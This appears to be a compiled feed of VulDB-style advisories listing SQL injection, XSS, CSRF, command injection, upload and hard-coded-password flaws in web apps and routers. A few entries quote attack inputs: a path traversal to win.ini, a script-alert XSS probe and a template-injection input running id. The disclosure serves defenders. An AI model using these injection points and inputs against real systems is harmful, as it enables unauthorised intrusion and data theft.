A vulnerability classified as problematic has been found in SourceCodester School Fees Payment System 1.0. This affects an unknown part of the file /ajax.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272583.
A vulnerability was found in SourceCodester School Fees Payment System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272582 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester School Fees Payment System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /manage_course.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272581 was assigned to this vulnerability.
A vulnerability was found in SourceCodester School Fees Payment System 1.0. It has been classified as critical. Affected is an unknown function of the file /receipt.php. The manipulation of the argument ef_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272580.
A vulnerability was found in SourceCodester School Fees Payment System 1.0 and classified as critical. This issue affects some unknown processing of the file /view_payment.php. The manipulation of the argument ef_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272579.
A vulnerability has been found in SourceCodester School Fees Payment System 1.0 and classified as critical. This vulnerability affects unknown code of the file /ajax.php?action=login. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-272578 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SeaCMS 12.9. This affects an unknown part of the file /js/player/dmplayer/player/index.php. The manipulation of the argument color/vid/url leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272577 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in SeaCMS 12.9/13.0. Affected by this issue is some unknown functionality of the file js/player/dmplayer/admin/post.php?act=setting. The manipulation of the argument yzm leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272576.
A vulnerability classified as problematic was found in SeaCMS 13.0. Affected by this vulnerability is an unknown functionality of the file /member.php?action=chgpwdsubmit of the component Password Change Handler. The manipulation of the argument newpwd/newpwd2 leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272575.
A vulnerability was found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. It has been rated as critical. This issue affects some unknown processing of the file /web_cste/cgi-bin/product.ini of the component Telnet Service. The manipulation leads to use of hard-coded password. The exploit has been disclosed to the public and may be used. The identifier VDB-272573 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in TOTOLINK A3700R 9.1.2u.5822_B20200513 and classified as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/ExportSettings.sh of the component apmib Configuration Handler. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in TOTOLINK A3300R 17.0.0cu.557_B20221024 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /etc/shadow.sample. The manipulation leads to use of hard-coded password. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-272569 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in TOTOLINK A3700R 9.1.2u.5822_B20200513. Affected is an unknown function of the file /wizard.html of the component Password Reset Handler. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272568. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Netgear WN604 up to 20240719. Affected is an unknown function of the file siteSurvey.php. The manipulation leads to direct request. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272556. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451.
A vulnerability, which was classified as critical, has been found in MD-MAFUJUL-HASAN Online-Payroll-Management-System up to 20230911. Affected by this issue is some unknown functionality of the file /employee_viewmore.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-272450 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in MD-MAFUJUL-HASAN Online-Payroll-Management-System up to 20230911. Affected by this vulnerability is an unknown functionality of the file /department_viewmore.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The identifier VDB-272449 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in MD-MAFUJUL-HASAN Online-Payroll-Management-System up to 20230911. Affected is an unknown function of the file /shift_viewmore.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-272448. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MD-MAFUJUL-HASAN Online-Payroll-Management-System up to 20230911. It has been rated as critical. This issue affects some unknown processing of the file /branch_viewmore.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-272447. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MD-MAFUJUL-HASAN Online-Payroll-Management-System up to 20230911. It has been declared as critical. This vulnerability affects unknown code of the file /designation_viewmore.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-272446 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Tianchoy Blog up to 1.8.8. It has been classified as critical. This affects an unknown part of the file /so.php. The manipulation of the argument search leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272445 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Spina CMS 2.18.0. Affected by this vulnerability is an unknown functionality of the file /admin/media_folders. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272431. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in ForIP Tecnologia Administração PABX 1.x. Affected is an unknown function of the file /detalheIdUra of the component Lista Ura Page. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272430 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in ForIP Tecnologia Administração PABX 1.x. This issue affects some unknown processing of the file /login of the component Authentication Form. The manipulation of the argument usuario leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272423. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file expcatadd.php. The manipulation of the argument title leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272366 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Insurance Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /E-Insurance/. The manipulation leads to direct request. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272365 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. This issue affects some unknown processing of the file /employee_gatepass/classes/Master.php?f=delete_department. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272351.
A vulnerability classified as problematic has been found in SourceCodester Insurance Management System 1.0. This affects an unknown part of the file /Script/admin/core/update_sub_category. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272349 was assigned to this vulnerability.
A vulnerability was found in F-logic DataCube3 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/config_time_sync.php of the component HTTP POST Request Handler. The manipulation of the argument ntp_server leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272347.
A vulnerability was found in Spina CMS up to 2.18.0. It has been classified as problematic. Affected is an unknown function of the file /admin/pages/. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272346 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in itsourcecode Tailoring Management System 1.0. Affected is an unknown function of the file /staffcatadd.php. The manipulation of the argument title leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272124.
A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /ajax/get_patient_history.php. The manipulation of the argument patient_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272123.
A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /print_patients_visits.php. The manipulation of the argument from/to leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-272122 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. It has been classified as critical. This affects an unknown part of the file /employee_gatepass/admin/?page=employee/manage_employee. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272121 was assigned to this vulnerability.
A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file login.php of the component Login. The manipulation of the argument user/pass leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272120.
A vulnerability classified as critical was found in itsourcecode University Management System 1.0. This vulnerability affects unknown code of the file /st_update.php of the component Avatar File Handler. The manipulation of the argument personal_image leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272080.
A vulnerability classified as critical has been found in itsourcecode University Management System 1.0. This affects an unknown part of the file functions.php of the component Login. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272079.
A vulnerability was found in itsourcecode University Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /view_cgpa.php. The manipulation of the argument VR/VN leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272078 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Record Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file sort2.php. The manipulation of the argument qualification leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272076.
A vulnerability was found in SourceCodester Record Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file sort1.php. The manipulation of the argument position leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272077 was assigned to this vulnerability.
A vulnerability was found in itsourcecode Tailoring Management System 1.0 and classified as critical. This issue affects some unknown processing of the file sms.php. The manipulation of the argument customer leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272075.
A vulnerability has been found in itsourcecode University Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /view_single_result.php?vr=123321&amp;vn=mirage. The manipulation of the argument seme leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-272074 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Simple Online Book Store System 1.0. This affects an unknown part of the file admin_delete.php. The manipulation of the argument bookisbn leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272073 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Prain up to 1.3.0. Affected by this issue is some unknown functionality of the file /?import of the component HTTP POST Request Handler. The manipulation of the argument file leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272072.
A vulnerability classified as problematic was found in Gargaj wuhu up to 3faad49bfcc3895e9ff76a591d05c8941273d120. Affected by this vulnerability is an unknown functionality of the file /pages.php?edit=News. The manipulation leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-272071.
A vulnerability classified as critical has been found in Gargaj wuhu up to 3faad49bfcc3895e9ff76a591d05c8941273d120. Affected is an unknown function of the file /slideeditor.php of the component Slide Editor. The manipulation of the argument newSlideFile leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-272070 is the identifier assigned to this vulnerability.
A vulnerability was found in Flute CMS 0.2.2.4-alpha. It has been declared as critical. This vulnerability affects unknown code of the file /admin/pages/list. The manipulation of the argument blocks leads to code injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272068.
A vulnerability was found in Flute CMS 0.2.2.4-alpha. It has been classified as critical. This affects an unknown part of the file app/Core/Http/Controllers/Profile/ImagesController.php of the component Avatar Upload Page. The manipulation of the argument avatar leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272067.
A vulnerability, which was classified as problematic, was found in ThinkSAAS 3.7.0. Affected is an unknown function of the file app/system/action/anti.php of the component Admin Panel Security Center. The manipulation of the argument ip/email/phone leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272064.
A vulnerability, which was classified as problematic, has been found in ThinkSAAS 3.7.0. This issue affects some unknown processing of the file app/system/action/do.php. The manipulation of the argument site_title/site_subtitle/site_key/site_desc/site_url/site_email/site_icp leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272063.
A vulnerability was found in DedeCMS 5.7.114. It has been classified as critical. This affects an unknown part of the file article_template_rand.php. The manipulation leads to code injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271995. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in SiYuan 3.1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file PDF.js of the component PDF Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271993 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in formtools.org Form Tools 3.1.1. This issue affects some unknown processing of the file /admin/settings/index.php?page=accounts of the component Setting Handler. The manipulation of the argument Page Theme leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271991. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in formtools.org Form Tools 3.1.1. This vulnerability affects unknown code of the file /admin/clients/ of the component User Settings Page. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-271990 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in formtools.org Form Tools 3.1.1. This affects an unknown part of the file /admin/forms/add/step2.php?submission_type=direct. The manipulation of the argument Form URL leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271989 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in ClassCMS 4.5. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/?action=home&amp;do=shop:index&amp;keyword=&amp;kind=all. The manipulation of the argument order leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271987.
A vulnerability was found in SourceCodester Record Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file sort.php. The manipulation of the argument sort leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271932.
A vulnerability was found in SourceCodester Record Management System 1.0 and classified as critical. This issue affects some unknown processing of the file add_leave_non_user.php. The manipulation of the argument LSS leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271931.
A vulnerability has been found in SourceCodester Record Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file view_info_user.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-271930 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Record Management System 1.0. This affects an unknown part of the file sort2_user.php. The manipulation of the argument qualification leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271929 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Record Management System 1.0. Affected by this issue is some unknown functionality of the file sort1_user.php. The manipulation of the argument position leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271928.
A vulnerability classified as critical was found in SourceCodester Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file sort_user.php. The manipulation of the argument sort leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271927.
A vulnerability classified as critical has been found in SourceCodester Record Management System 1.0. Affected is an unknown function of the file entry.php. The manipulation of the argument school leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-271926 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Record Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file edit_emp.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271925 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Record Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file view_info.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271924.
A vulnerability was found in SourceCodester Record Management System 1.0. It has been classified as critical. This affects an unknown part of the file index.php. The manipulation of the argument UserName leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271923.
A vulnerability, which was classified as critical, was found in SourceCodester Simple Inventory Management System 1.0. Affected is an unknown function of the file action.php of the component Order Handler. The manipulation of the argument order_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271812.
A vulnerability was found in SourceCodester Student Study Center Desk Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /sscdms/classes/Users.php?f=save of the component HTTP POST Request Handler. The manipulation of the argument firstname/middlename/lastname/username leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in itsourcecode Document Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file insert.php. The manipulation of the argument anothercont leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271705 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Computer Laboratory Management System 1.0. Affected is an unknown function of the file /lms/classes/Master.php?f=save_record. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Student Management System 1.0. This issue affects some unknown processing of the file /add-students.php. The manipulation of the argument image leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271703.
A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \EasySpider\resources\app\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used. The identifier VDB-271477 was assigned to this vulnerability. NOTE: The code maintainer explains, that this is not a big issue "because the default is that the software runs locally without going through the Internet".
A vulnerability classified as critical has been found in code-projects Simple Ticket Booking 1.0. Affected is an unknown function of the file adminauthenticate.php of the component Login. The manipulation of the argument email/password leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271476.
A vulnerability was found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. It has been rated as critical. This issue affects some unknown processing of the file view_employee.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271457 was assigned to this vulnerability.
A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file setgeneral.php. The manipulation of the argument sitename/email/mobile/sms/currency leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271456.
A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been classified as critical. This affects an unknown part of the file templateadd.php. The manipulation of the argument title/msg leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271455.
A vulnerability was found in itsourcecode Tailoring Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file templateedit.php. The manipulation of the argument id/title/msg leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-271454 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Student Study Center Desk Management System 1.0. This vulnerability affects unknown code of the file /sscdms/classes/Users.php?f=save. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Student Study Center Desk Management System 1.0. This affects an unknown part of the file /Master.php?f=save_student. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Nanjing Xingyuantu Technology SparkShop up to 1.1.6. It has been rated as critical. This issue affects some unknown processing of the file /api/Common/uploadFile. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271403.
A vulnerability was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /control/add_act.php. The manipulation of the argument aname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been classified as critical. This affects an unknown part of the file typeedit.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271401 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in witmy my-springsecurity-plus up to 2024-07-04. Affected by this issue is some unknown functionality of the file /api/dept. The manipulation of the argument params.dataScope leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-271154 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in witmy my-springsecurity-plus up to 2024-07-04. Affected by this vulnerability is an unknown functionality of the file /api/dept/build. The manipulation of the argument params.dataScope leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271153 was assigned to this vulnerability.
A vulnerability classified as critical has been found in witmy my-springsecurity-plus up to 2024-07-04. Affected is an unknown function of the file /api/role. The manipulation of the argument params.dataScope leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271152.
A vulnerability has been found in witmy my-springsecurity-plus up to 2024-07-03 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /api/user. The manipulation of the argument params.dataScope leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-271111.
A vulnerability was found in code-projects Simple Task List 1.0. It has been declared as critical. This vulnerability affects unknown code of the file loginForm.php of the component Login. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271060.
A vulnerability was found in itsourcecode Gym Management System 1.0. It has been classified as critical. This affects an unknown part of the file manage_member.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271059.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical has been found in Croogo up to 4.0.7. This affects an unknown part of the file admin/settings/settings/prefix/Theme of the component Setting Handler. The manipulation of the argument Content-Type leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271053 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability was found in Netgear WN604 up to 20240710. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /downloadFile.php of the component Web Interface. The manipulation of the argument file with the input config leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271052. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in WuKongOpenSource Wukong_nocode up to 20230807. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file ExpressionUtil.java of the component AviatorScript Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-271051.
A vulnerability classified as problematic has been found in heyewei SpringBootCMS up to 2024-05-28. Affected is an unknown function of the file /guestbook of the component Guestbook Handler. The manipulation of the argument Content leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-270450 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in CodeIgniter Ecommerce-CodeIgniter-Bootstrap up to 1998845073cf433bc6c250b0354461fbd84d0e03. This affects an unknown part. The manipulation of the argument search_title/catName/sub/name/categorie leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 1b3da45308bb6c3f55247d0e99620b600bd85277. It is recommended to apply a patch to fix this issue. The identifier VDB-270369 was assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 up to 20230922. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-270368. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability was found in ShopXO up to 6.1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file extend/base/Uploader.php. The manipulation of the argument source leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-270367. NOTE: The original disclosure confuses CSRF with SSRF.
A vulnerability was found in ZKTeco BioTime up to 9.5.2. It has been classified as problematic. Affected is an unknown function of the component system-group-add Handler. The manipulation of the argument user with the input &lt;script&gt;alert('XSS')&lt;/script&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-270366 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in SourceCodester Online Tours &amp; Travels Management 1.0. This affects an unknown part of the file sms_setting.php. The manipulation of the argument uname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-270279.
A vulnerability was found in playSMS 1.4.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /index.php?app=main&amp;inc=feature_inboxgroup&amp;op=list of the component Template Handler. The manipulation of the argument Receiver Number with the input {{`id`}} leads to injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-270278 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in playSMS 1.4.3. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php?app=main&amp;inc=feature_firewall&amp;op=firewall_list of the component Template Handler. The manipulation of the argument IP address with the input {{`id`} leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-270277 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
